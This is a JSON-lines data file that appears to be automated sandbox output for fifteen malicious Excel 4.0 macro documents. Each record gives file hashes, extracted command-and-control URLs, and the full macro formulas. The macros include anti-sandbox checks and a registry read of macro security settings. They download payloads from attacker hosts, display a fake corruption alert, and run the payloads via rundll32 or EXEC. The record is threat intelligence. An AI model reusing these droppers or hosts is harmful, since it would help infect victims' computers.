{"version":"0.2","sample":{"sample":"","kind":"file","target":"3dbd08a33ffb78ec59fd7b10ba12be04eeaec5ac8df2adb3dea5619baf433622"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3dbd08a33ffb78ec59fd7b10ba12be04eeaec5ac8df2adb3dea5619baf433622","filesize":206336,"md5":"87716642c550b920a2cf0be397818b98","sha1":"cbdd32ca544eeffda6696277f65da441b7436e25","sha256":"3dbd08a33ffb78ec59fd7b10ba12be04eeaec5ac8df2adb3dea5619baf433622","sha512":"be05da7e77456b96db7b38a31a40eff4a4e0f0ac1b191bc338dbe0915524705eab90063bf6234c103b6c0607dc516a09afc3e4cad8e9f460f5258dff59a4cb81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3dbd08a33ffb78ec59fd7b10ba12be04eeaec5ac8df2adb3dea5619baf433622.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GBrGOycq5L\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3dcb486ac9d1be23f43e002f83a6ddca9545ff7d2ac7629eaeac95d730886cf2"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3dcb486ac9d1be23f43e002f83a6ddca9545ff7d2ac7629eaeac95d730886cf2","filesize":167936,"md5":"14ef55bc967add1b61cca7c9339ed144","sha1":"479bd0afe64005be763545e49ca87eb0fd9c81e6","sha256":"3dcb486ac9d1be23f43e002f83a6ddca9545ff7d2ac7629eaeac95d730886cf2","sha512":"f970aae5ffd5762af5fcba32f3455ad329b43818c43b8aabca5b02cf5a1e144561cf8820e9334b864fb5bf3e66adad335e1e5fd7322099c603afb666d2d02721","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3dcb486ac9d1be23f43e002f83a6ddca9545ff7d2ac7629eaeac95d730886cf2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jRyoKszCyZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ddeec37877ab3bd6d467a6ff8d85cb4a8f102f4c1c737d5fbe69dbf3339cc14"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3ddeec37877ab3bd6d467a6ff8d85cb4a8f102f4c1c737d5fbe69dbf3339cc14","filesize":141312,"md5":"83718fb20d547819bed0718c63785bb6","sha1":"34ed7d39005e42d2753551fc1ddf4d5b548c1099","sha256":"3ddeec37877ab3bd6d467a6ff8d85cb4a8f102f4c1c737d5fbe69dbf3339cc14","sha512":"7c28e1e641dc5d6844cdb722a4192dcc85b4feebab5b58dd570e75e5508d3566faf2b6c2af516d0518f7a6dab340620aeeaf08fc6995ecf5656429b51c64e94f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ddeec37877ab3bd6d467a6ff8d85cb4a8f102f4c1c737d5fbe69dbf3339cc14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"z7jw4aM7MI\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3de2d0d12c0b85df69f566eb246d5a9e5f36e6a0171d566888b4b7af181100cf"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3de2d0d12c0b85df69f566eb246d5a9e5f36e6a0171d566888b4b7af181100cf","filesize":167936,"md5":"bcb9da8c69a1f841908a33c92908de5f","sha1":"63f718f257f6ccb885473e83acfa1be0f3d4e864","sha256":"3de2d0d12c0b85df69f566eb246d5a9e5f36e6a0171d566888b4b7af181100cf","sha512":"79c7eac2cf75c2d73b79a27409d33ab6a0ff45d666ce6326ffb1af1c463cbfa429b5b5b38fdf958ab8361572b1343ac4354aad566bd5a065eaf514fc64a90faa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3de2d0d12c0b85df69f566eb246d5a9e5f36e6a0171d566888b4b7af181100cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ars7oTZKba\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3dedbf517a20c3e418ba0fa69cabd256b31c7254ecd1c77808397b12635bf11a"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3dedbf517a20c3e418ba0fa69cabd256b31c7254ecd1c77808397b12635bf11a","filesize":113664,"md5":"da7eea06bad2df99099f8a3d75e80262","sha1":"b694fc65b660230b4415c68ecd13360e972fddfc","sha256":"3dedbf517a20c3e418ba0fa69cabd256b31c7254ecd1c77808397b12635bf11a","sha512":"41389e41af493c8f94874f603e3eb70ad2704cb52e49bcff8226b30a93a22e739128d288377ed7f660bca719eb17de23f43885a927d48d2e5b0747ddcf46a7e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3dedbf517a20c3e418ba0fa69cabd256b31c7254ecd1c77808397b12635bf11a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"ndWg6LTDAX\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3df38c34d1009cb065021663d6e01835ee8c308dec6dc782dc5cc3a7f5bd1359"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3df38c34d1009cb065021663d6e01835ee8c308dec6dc782dc5cc3a7f5bd1359","filesize":112128,"md5":"44b1a35f0668682d27e880fff8d0b117","sha1":"8deb5bb87709cdff3a2e7fe0f9c2f0c2182b0f46","sha256":"3df38c34d1009cb065021663d6e01835ee8c308dec6dc782dc5cc3a7f5bd1359","sha512":"81dacaf6bf82c9025cc3e45a21854ca4074e4d8df8272e8085e783c20518bdb7db0d3ffcab446703ac9983120fcf5f03bdc0e478da03ca1381a2289d3d08162c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3df38c34d1009cb065021663d6e01835ee8c308dec6dc782dc5cc3a7f5bd1359.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3df64e33e81189247aa4e4806f9d666dfed8543a1d2dafd199d80c96a125a76b"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3df64e33e81189247aa4e4806f9d666dfed8543a1d2dafd199d80c96a125a76b","filesize":185344,"md5":"3c0bfa7a40e61806ec20eda787b4a59f","sha1":"9f8219352dc5ca9885222cdea4d324190e8251d3","sha256":"3df64e33e81189247aa4e4806f9d666dfed8543a1d2dafd199d80c96a125a76b","sha512":"0ca738771944350b5e5bab6f2a515d109021a25747a444acbcd71c86a71948cb51df50d6501b20fbaa4b816b103b1fc13e6935c736f6b516b1a387d7e1cfa331","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3df64e33e81189247aa4e4806f9d666dfed8543a1d2dafd199d80c96a125a76b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e04487f2b97d83c22a969a80f3f6e78b64fb4fa45089a6899ec1610ebe3cc53"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3e04487f2b97d83c22a969a80f3f6e78b64fb4fa45089a6899ec1610ebe3cc53","filesize":141824,"md5":"e0085302bf63e47c506cf6a55960232a","sha1":"3717f9b53fd1c02de062d49875fb3fd966d8e2ea","sha256":"3e04487f2b97d83c22a969a80f3f6e78b64fb4fa45089a6899ec1610ebe3cc53","sha512":"0880f0e9eee64f4cd0ceaae4e55474430ffe8f9d42d34fa12cda1b9b9f97ce463e7cf55a3c13d31529fff173b6fafdcb5634c97c229ce5f10809e28734e0ac85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e04487f2b97d83c22a969a80f3f6e78b64fb4fa45089a6899ec1610ebe3cc53.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"cNE4EDImUd\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e1ab3d6ea10c7ea18345c94535c73b974331afa7f5d6bf053ac82832fbf8376"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3e1ab3d6ea10c7ea18345c94535c73b974331afa7f5d6bf053ac82832fbf8376","filesize":185344,"md5":"86e2a34b6b40e0a6d40c6791163f068e","sha1":"3e457630c2435bf094669f9f05a9c5d0c446aae0","sha256":"3e1ab3d6ea10c7ea18345c94535c73b974331afa7f5d6bf053ac82832fbf8376","sha512":"24334693cec92014fee47b93dd846efb01071579905901320a40160b925b801171454bdbe7236994f3a4cc99964376b90aa71e4677246cc2a521f2d427a321de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e1ab3d6ea10c7ea18345c94535c73b974331afa7f5d6bf053ac82832fbf8376.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e356bec6dc36e08e5e3b22325afbc673a0ec9ed20622e82decb4dc90e78aa39"},"analysis":{"reported":"2020-04-09T16:15:54Z","score":10},"files":[{"filename":"3e356bec6dc36e08e5e3b22325afbc673a0ec9ed20622e82decb4dc90e78aa39","filesize":152576,"md5":"01a7fcd29015efafd982990d53f5179a","sha1":"18378ffa0b74017d1bb2b0b794fed1841fab4cef","sha256":"3e356bec6dc36e08e5e3b22325afbc673a0ec9ed20622e82decb4dc90e78aa39","sha512":"fe5b59a4dafdc602c51ed4571f7b4821e185a9f25d18d640ade26cd2d62140344b422ea34e9d188163a738aa5eaf80d9d1775d3ea63d5e27137a2fdaa36c9a45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e356bec6dc36e08e5e3b22325afbc673a0ec9ed20622e82decb4dc90e78aa39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VDFiIlvMfZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e3ffebec4e33f04b20a559b400143be3b0bc146fba50866cb49465960a62aed"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e3ffebec4e33f04b20a559b400143be3b0bc146fba50866cb49465960a62aed","filesize":214528,"md5":"ab9aba983f5667e1a72da2894144239b","sha1":"1385a2487e82924d22496eb008ddab2672bc3260","sha256":"3e3ffebec4e33f04b20a559b400143be3b0bc146fba50866cb49465960a62aed","sha512":"6da84a7fe7018e3aa2281f2129789a7a949f29f316d0ee47c42fb62143d1a69649484ec8f6d4af09e1f06cb85551afddf206e266bfbc21140947ae737ec62eae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e3ffebec4e33f04b20a559b400143be3b0bc146fba50866cb49465960a62aed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3khZ7lA1Jb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e546cfef5ecb4fe54b9f12d704772e6f543706e0ef17cf094347c03f650d85c"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e546cfef5ecb4fe54b9f12d704772e6f543706e0ef17cf094347c03f650d85c","filesize":168448,"md5":"854c9f30b34fbd278ca3bd633ab30ccf","sha1":"b2842b1ac8c06032d8c40ee0ff54dab67f543d4d","sha256":"3e546cfef5ecb4fe54b9f12d704772e6f543706e0ef17cf094347c03f650d85c","sha512":"e3441c2aa4ceace820a1ba1d93e2e8ff9a483ed1e6adea6a810ddd73b26f29134cd1f5854aa724549e3fa023f0285bf1dc1834d476a78f1f9c31f7ba5cdd92aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e546cfef5ecb4fe54b9f12d704772e6f543706e0ef17cf094347c03f650d85c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mykxHCFuVF\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e640c6a7348fcdc78c0919ba65e91b0279f09ae0fc1b5419d07f2839fc616bc"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e640c6a7348fcdc78c0919ba65e91b0279f09ae0fc1b5419d07f2839fc616bc","filesize":214016,"md5":"fec20d83630dfe2a4bc7b807f555472a","sha1":"f01fa01244bed9774a48bfc057f16f2eb994e221","sha256":"3e640c6a7348fcdc78c0919ba65e91b0279f09ae0fc1b5419d07f2839fc616bc","sha512":"43b9d3a4ce949df8feebefbab018a4641243b956da7e614a51db670470368c4a2a87c4e4b476c4b58aac1dc1faee2143c8dfc6b3865d4db777d9f05c51fe6e0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e640c6a7348fcdc78c0919ba65e91b0279f09ae0fc1b5419d07f2839fc616bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6ZN6ag0Fdf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e6feacf48e14e98bd3b9c1247b06361043350258fb06c50efc651dc4793e95e"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e6feacf48e14e98bd3b9c1247b06361043350258fb06c50efc651dc4793e95e","filesize":185344,"md5":"e2944734cd91038009ec209e8a02349d","sha1":"e63761bb0316f240fcc5e06e8e66126166072eb8","sha256":"3e6feacf48e14e98bd3b9c1247b06361043350258fb06c50efc651dc4793e95e","sha512":"526f643d15852b1868e18c464d44c10443ca90c8c7ac0d7aa2a3c0c7d8bd1e08a4328e7cb658be491090c69b92b54f001a645c782eafa202f0f77d707d0f7285","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e6feacf48e14e98bd3b9c1247b06361043350258fb06c50efc651dc4793e95e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3e73d7b5267495df902e4f898d485ba87c59e9a5c966f7a91a8456f2b0e9c778"},"analysis":{"reported":"2020-04-09T16:15:55Z","score":10},"files":[{"filename":"3e73d7b5267495df902e4f898d485ba87c59e9a5c966f7a91a8456f2b0e9c778","filesize":167936,"md5":"bd31d76c6bef1a9b2ea9ada545261462","sha1":"3ccc2b05585bc6a41ae2045fcf78c2be2b1b52ca","sha256":"3e73d7b5267495df902e4f898d485ba87c59e9a5c966f7a91a8456f2b0e9c778","sha512":"a839ae67047b8eaf64419ab6f948f482e3ab101fed4a09ef22e282d0ec18c6f7ddafc81d9e0269ba771ac81154c8be6a9fd6fb09638974e416b07d49cf857476","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3e73d7b5267495df902e4f898d485ba87c59e9a5c966f7a91a8456f2b0e9c778.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GSpT9soe5C\",TRUE)\nGOTO(R$0C$19)"}}}]}
